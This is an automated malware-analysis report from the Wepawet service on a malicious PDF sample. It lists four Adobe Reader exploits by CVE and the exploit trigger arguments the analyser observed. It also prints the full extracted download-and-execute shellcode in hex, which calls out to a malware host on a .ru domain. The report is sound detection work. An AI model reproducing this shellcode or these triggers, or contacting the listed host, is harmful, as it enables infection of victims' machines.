Wepawet » Report for ab056c0e261160aeabe56836e21b4408

Analysis report for jkjom_com-ChangeLog_pdf.bin

Sample Overview

File	jkjom_com-ChangeLog_pdf.bin
MD5	ab056c0e261160aeabe56836e21b4408
Analysis Started	2010-02-17 17:46:47
Report Generated	2010-02-18 00:36:03
Jsand version	1.02.02

Detection results

Detector	Result
Jsand 1.02.02	malicious

Exploits

Name	Description	Reference
Adobe Collab overflow	Multiple Adobe Reader and Acrobat buffer overflows	CVE-2007-5659
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992
Adobe getIcon	Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object	CVE-2009-0927
doc.media.newPlayer	Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2	CVE-2009-4324

Deobfuscation results

Evals

No evals.

Writes

No writes.

Network Activity

Requests

URL
file://jkjom_com-ChangeLog_pdf.bin

ActiveX controls

AcrobatJavaScript
	Name	Arg0	Arg1	Count
Methods	media.newPlayer	(null)		1
	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
	util.printf	%45000f	1.3E295	1
	info.Author			4

Shellcode and Malware

Hexadecimal	ASCII
0a 0a 0a 0a 0a 0a 0a 0a 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 79 6f 75 72 6e 65 77 7a 69 70 2e 72 75 3a 38 30 38 30 2f 6d 61 69 6e 2e 70 68 70 3f 69 64 3d 36 26 68 65 6c 6c 6f 33 31 34	........3.d.@0x. .@..p...X....@4. @\|.X<jDZ..+....O ZR..V.U.VW.s<.t3 x..V.v ..3.IPA.3 .6....8.t......@ ..X;.u.^.F$..f.. H.V........_^P.. }.WR.3..[.....2. ....O.e.ex.f.f.. l...Phon.dhurlmT ..N...U..P3.PPV. U......1RP.6./p. U.[3.WV......U.W ....`.U.http://y ournewzip.ru:808 0/main.php?id=6& hello314

Hexadecimal

ASCII

0a 0a 0a 0a 0a 0a 0a 0a  33 c0 64 8b 40 30 78 0c 
8b 40 0c 8b 70 1c ad 8b  58 08 eb 09 8b 40 34 8d 
40 7c 8b 58 3c 6a 44 5a  d1 e2 2b e2 8b ec eb 4f 
5a 52 83 ea 56 89 55 04  56 57 8b 73 3c 8b 74 33 
78 03 f3 56 8b 76 20 03  f3 33 c9 49 50 41 ad 33 
ff 36 0f be 14 03 38 f2  74 08 c1 cf 0d 03 fa 40 
eb ef 58 3b f8 75 e5 5e  8b 46 24 03 c3 66 8b 0c 
48 8b 56 1c 03 d3 8b 04  8a 03 c3 5f 5e 50 c3 8d 
7d 08 57 52 b8 33 ca 8a  5b e8 a2 ff ff ff 32 c0 
8b f7 f2 ae 4f b8 65 2e  65 78 ab 66 98 66 ab b0 
6c 8a e0 98 50 68 6f 6e  2e 64 68 75 72 6c 6d 54 
b8 8e 4e 0e ec ff 55 04  93 50 33 c0 50 50 56 8b 
55 04 83 c2 7f 83 c2 31  52 50 b8 36 1a 2f 70 ff 
55 04 5b 33 ff 57 56 b8  98 fe 8a 0e ff 55 04 57 
b8 ef ce e0 60 ff 55 04  68 74 74 70 3a 2f 2f 79 
6f 75 72 6e 65 77 7a 69  70 2e 72 75 3a 38 30 38 
30 2f 6d 61 69 6e 2e 70  68 70 3f 69 64 3d 36 26 
68 65 6c 6c 6f 33 31 34

........3.d.@0x.
.@..p...X....@4.
@|.X<jDZ..+....O
ZR..V.U.VW.s<.t3
x..V.v ..3.IPA.3
.6....8.t......@
..X;.u.^.F$..f..
H.V........_^P..
}.WR.3..[.....2.
....O.e.ex.f.f..
l...Phon.dhurlmT
..N...U..P3.PPV.
U......1RP.6./p.
U.[3.WV......U.W
....`.U.http://y
ournewzip.ru:808
0/main.php?id=6&
hello314

Additional (potential) malware:

URL	Type	Hash	Analysis
http://yournewzip.ru:8080/main.php?id=6&hello314	N/A	N/A